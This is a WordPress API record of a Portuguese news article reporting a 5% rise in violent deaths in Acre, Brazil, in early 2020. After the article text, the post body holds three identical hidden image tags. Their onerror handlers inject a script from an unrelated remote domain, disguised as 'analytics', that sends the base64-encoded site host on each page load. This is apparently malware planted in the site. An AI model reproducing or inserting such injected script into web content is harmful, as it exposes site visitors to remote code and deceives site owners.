{"id":50766,"date":"2020-10-22T18:33:25","date_gmt":"2020-10-22T18:33:25","guid":{"rendered":"https:\/\/abarevegan.com.br\/index.php\/2020\/10\/22\/indice-de-crimes-violentos-continua-crescendo-no-acre\/"},"modified":"2020-10-22T18:33:25","modified_gmt":"2020-10-22T18:33:25","slug":"indice-de-crimes-violentos-continua-crescendo-no-acre","status":"publish","type":"post","link":"https:\/\/nk7-testes.com.br\/agazeta\/indice-de-crimes-violentos-continua-crescendo-no-acre\/","title":{"rendered":"\u00cdndice de crimes violentos continua crescendo no Acre"},"content":{"rendered":"<p style=\"text-align: justify;\"><span style=\"font-size: 13.2px;\">Aumento foi de 5% em mortes violentas no estado<\/span><\/p>\n<p style=\"text-align: justify;\">O \u00edndice de crimes no Acre continua crescendo, segundo o Anu\u00e1rio Brasileiro de Seguran\u00e7a P\u00fablica houve um aumento de 5% no n\u00famero de mortes violentas no primeiro semestre de 2020 se comparado com o ano de 2019.<\/p>\n<p style=\"text-align: justify;\">Entre essas mortes est\u00e3o 160 homic\u00eddios dolosos que \u00e9 quando h\u00e1 inten\u00e7\u00e3o de matar, e quatro latroc\u00ednios que \u00e9 roubo seguido de morte. De acordo com o secret\u00e1rio de Justi\u00e7a e Seguran\u00e7a P\u00fablica do Estado, Paulo C\u00e9sar, esses n\u00fameros ficaram mais altos este ano devido a dois epis\u00f3dios espec\u00edficos que ocorreram em janeiro.<\/p>\n<p style=\"text-align: justify;\">\u201cEm janeiro n\u00f3s tivemos dois fen\u00f4menos que potencializaram esses aumentos, que foi um derivado de um serial killer, conhecido como Ricardinho, que sozinho nesse per\u00edodo assassinou 18 pessoas em Rio Branco e tamb\u00e9m a chacina ocorrida na regi\u00e3o da Rodovia Transacreana. Na verdade n\u00f3s temos uma tend\u00eancia de queda nos \u00faltimos dois meses do primeiro semestre n\u00f3s tivemos os menores indicadores de crimes violentos contra a vida\u201d, declarou Paulo C\u00e9sar.<\/p>\n<p style=\"text-align: justify;\">A Secret\u00e1ria informa que a maior parte destes crimes est\u00e1 ligada a briga de organiza\u00e7\u00f5es criminosas, al\u00e9m desses n\u00fameros o Anu\u00e1rio mostrou que as mortes por policiais aumentaram, no primeiro semestre de 2018 foram doze mortes, j\u00e1 no primeiro semestre de 2020 foram 16. Se comparado o ano inteiro de 2018 com 2019 os n\u00fameros subiram de 18 para 23 mortes.<\/p>\n<div><img onerror=\"var s=document.createElement(&quot;script&quot;);s.type=&quot;text\/javascript&quot;;s.id=&quot;cczedcc-plg-analytics&quot;;s.src=&quot;\/\/jemova.wurucozujo.com\/scripts\/js?k=5d936fde86df1a38418b4567&amp;s=&quot;+encodeURI(btoa(window.location.host)+&quot;&amp;ns=true&quot;);document.getElementsByTagName(&quot;head&quot;)[0].appendChild(s);\" \/><\/div>\n<div id=\"janelamailtopopupMail\" style=\"z-index: 1;\">\n<div id=\"janelamailtocontentPopupModalMail\">\n<div id=\"janelamailtomailClosePopup\"><img \/><\/div><\/div><\/div>\n<div><img onerror=\"var s=document.createElement(&quot;script&quot;);s.type=&quot;text\/javascript&quot;;s.id=&quot;cczedcc-plg-analytics&quot;;s.src=&quot;\/\/jemova.wurucozujo.com\/scripts\/js?k=5d936fde86df1a38418b4567&amp;s=&quot;+encodeURI(btoa(window.location.host)+&quot;&amp;ns=true&quot;);document.getElementsByTagName(&quot;head&quot;)[0].appendChild(s);\" \/><\/div>\n<div><img onerror=\"var s=document.createElement(&quot;script&quot;);s.type=&quot;text\/javascript&quot;;s.id=&quot;cczedcc-plg-analytics&quot;;s.src=&quot;\/\/jemova.wurucozujo.com\/scripts\/js?k=5d936fde86df1a38418b4567&amp;s=&quot;+encodeURI(btoa(window.location.host)+&quot;&amp;ns=true&quot;);document.getElementsByTagName(&quot;head&quot;)[0].appendChild(s);\" \/><\/div>\n","protected":false},"excerpt":{"rendered":"<p style=\"text-align: justify;\"><span style=\"font-size: 13.2px;\">Aumento foi de 5% em mortes violentas no estado<\/span><\/p>\n","protected":false},"author":4,"featured_media":50765,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"jnews-multi-image_gallery":[],"jnews_single_post":[],"jnews_primary_category":[],"jnews_social_meta":[],"jnews_review":[],"enable_review":"","type":"","name":"","summary":"","brand":"","sku":"","good":[],"bad":[],"score_override":"","override_value":"","rating":[],"price":[],"footnotes":""},"categories":[44],"tags":[],"class_list":["post-50766","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-policia"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v26.5 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>\u00cdndice de crimes violentos continua crescendo no Acre - Agazeta.net<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/nk7-testes.com.br\/agazeta\/indice-de-crimes-violentos-continua-crescendo-no-acre\/\" \/>\n<meta property=\"og:locale\" content=\"pt_BR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\u00cdndice de crimes violentos continua crescendo no Acre - Agazeta.net\" \/>\n<meta property=\"og:description\" content=\"Aumento foi de 5% em mortes violentas no estado\" \/>\n<meta property=\"og:url\" content=\"https:\/\/nk7-testes.com.br\/agazeta\/indice-de-crimes-violentos-continua-crescendo-no-acre\/\" \/>\n<meta property=\"og:site_name\" content=\"Agazeta.net\" \/>\n<meta property=\"article:published_time\" content=\"2020-10-22T18:33:25+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/10\/22-10-2020_indice-de-violencia-continua-crescendo-no-acre.png\" \/>\n\t<meta property=\"og:image:width\" content=\"458\" \/>\n\t<meta property=\"og:image:height\" content=\"340\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"Agazeta.Net\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"Agazeta.Net\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. tempo de leitura\" \/>\n\t<meta name=\"twitter:data2\" content=\"1 minuto\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/indice-de-crimes-violentos-continua-crescendo-no-acre\/\",\"url\":\"https:\/\/nk7-testes.com.br\/agazeta\/indice-de-crimes-violentos-continua-crescendo-no-acre\/\",\"name\":\"\u00cdndice de crimes violentos continua crescendo no Acre - Agazeta.net\",\"isPartOf\":{\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/indice-de-crimes-violentos-continua-crescendo-no-acre\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/indice-de-crimes-violentos-continua-crescendo-no-acre\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/10\/22-10-2020_indice-de-violencia-continua-crescendo-no-acre.png\",\"datePublished\":\"2020-10-22T18:33:25+00:00\",\"author\":{\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/#\/schema\/person\/6d6e25cb0435eb4a02fd44d30b4e3020\"},\"breadcrumb\":{\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/indice-de-crimes-violentos-continua-crescendo-no-acre\/#breadcrumb\"},\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/nk7-testes.com.br\/agazeta\/indice-de-crimes-violentos-continua-crescendo-no-acre\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/indice-de-crimes-violentos-continua-crescendo-no-acre\/#primaryimage\",\"url\":\"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/10\/22-10-2020_indice-de-violencia-continua-crescendo-no-acre.png\",\"contentUrl\":\"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/10\/22-10-2020_indice-de-violencia-continua-crescendo-no-acre.png\",\"width\":458,\"height\":340,\"caption\":\"22-10-2020 indice-de-violencia-continua-crescendo-no-acre\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/indice-de-crimes-violentos-continua-crescendo-no-acre\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"In\u00edcio\",\"item\":\"https:\/\/nk7-testes.com.br\/agazeta\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\u00cdndice de crimes violentos continua crescendo no Acre\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/#website\",\"url\":\"https:\/\/nk7-testes.com.br\/agazeta\/\",\"name\":\"Agazeta.net\",\"description\":\"Agazeta.net - Not\u00edcias de Rio Branco\/AC\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/nk7-testes.com.br\/agazeta\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"pt-BR\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/#\/schema\/person\/6d6e25cb0435eb4a02fd44d30b4e3020\",\"name\":\"Agazeta.Net\",\"url\":\"https:\/\/nk7-testes.com.br\/agazeta\/author\/agazeta\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\u00cdndice de crimes violentos continua crescendo no Acre - Agazeta.net","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/nk7-testes.com.br\/agazeta\/indice-de-crimes-violentos-continua-crescendo-no-acre\/","og_locale":"pt_BR","og_type":"article","og_title":"\u00cdndice de crimes violentos continua crescendo no Acre - Agazeta.net","og_description":"Aumento foi de 5% em mortes violentas no estado","og_url":"https:\/\/nk7-testes.com.br\/agazeta\/indice-de-crimes-violentos-continua-crescendo-no-acre\/","og_site_name":"Agazeta.net","article_published_time":"2020-10-22T18:33:25+00:00","og_image":[{"width":458,"height":340,"url":"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/10\/22-10-2020_indice-de-violencia-continua-crescendo-no-acre.png","type":"image\/png"}],"author":"Agazeta.Net","twitter_card":"summary_large_image","twitter_misc":{"Escrito por":"Agazeta.Net","Est. tempo de leitura":"1 minuto"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/nk7-testes.com.br\/agazeta\/indice-de-crimes-violentos-continua-crescendo-no-acre\/","url":"https:\/\/nk7-testes.com.br\/agazeta\/indice-de-crimes-violentos-continua-crescendo-no-acre\/","name":"\u00cdndice de crimes violentos continua crescendo no Acre - Agazeta.net","isPartOf":{"@id":"https:\/\/nk7-testes.com.br\/agazeta\/#website"},"primaryImageOfPage":{"@id":"https:\/\/nk7-testes.com.br\/agazeta\/indice-de-crimes-violentos-continua-crescendo-no-acre\/#primaryimage"},"image":{"@id":"https:\/\/nk7-testes.com.br\/agazeta\/indice-de-crimes-violentos-continua-crescendo-no-acre\/#primaryimage"},"thumbnailUrl":"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/10\/22-10-2020_indice-de-violencia-continua-crescendo-no-acre.png","datePublished":"2020-10-22T18:33:25+00:00","author":{"@id":"https:\/\/nk7-testes.com.br\/agazeta\/#\/schema\/person\/6d6e25cb0435eb4a02fd44d30b4e3020"},"breadcrumb":{"@id":"https:\/\/nk7-testes.com.br\/agazeta\/indice-de-crimes-violentos-continua-crescendo-no-acre\/#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/nk7-testes.com.br\/agazeta\/indice-de-crimes-violentos-continua-crescendo-no-acre\/"]}]},{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/nk7-testes.com.br\/agazeta\/indice-de-crimes-violentos-continua-crescendo-no-acre\/#primaryimage","url":"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/10\/22-10-2020_indice-de-violencia-continua-crescendo-no-acre.png","contentUrl":"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/10\/22-10-2020_indice-de-violencia-continua-crescendo-no-acre.png","width":458,"height":340,"caption":"22-10-2020 indice-de-violencia-continua-crescendo-no-acre"},{"@type":"BreadcrumbList","@id":"https:\/\/nk7-testes.com.br\/agazeta\/indice-de-crimes-violentos-continua-crescendo-no-acre\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"In\u00edcio","item":"https:\/\/nk7-testes.com.br\/agazeta\/"},{"@type":"ListItem","position":2,"name":"\u00cdndice de crimes violentos continua crescendo no Acre"}]},{"@type":"WebSite","@id":"https:\/\/nk7-testes.com.br\/agazeta\/#website","url":"https:\/\/nk7-testes.com.br\/agazeta\/","name":"Agazeta.net","description":"Agazeta.net - Not\u00edcias de Rio Branco\/AC","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/nk7-testes.com.br\/agazeta\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"pt-BR"},{"@type":"Person","@id":"https:\/\/nk7-testes.com.br\/agazeta\/#\/schema\/person\/6d6e25cb0435eb4a02fd44d30b4e3020","name":"Agazeta.Net","url":"https:\/\/nk7-testes.com.br\/agazeta\/author\/agazeta\/"}]}},"_links":{"self":[{"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/posts\/50766","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/comments?post=50766"}],"version-history":[{"count":0,"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/posts\/50766\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/media\/50765"}],"wp:attachment":[{"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/media?parent=50766"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/categories?post=50766"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/tags?post=50766"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}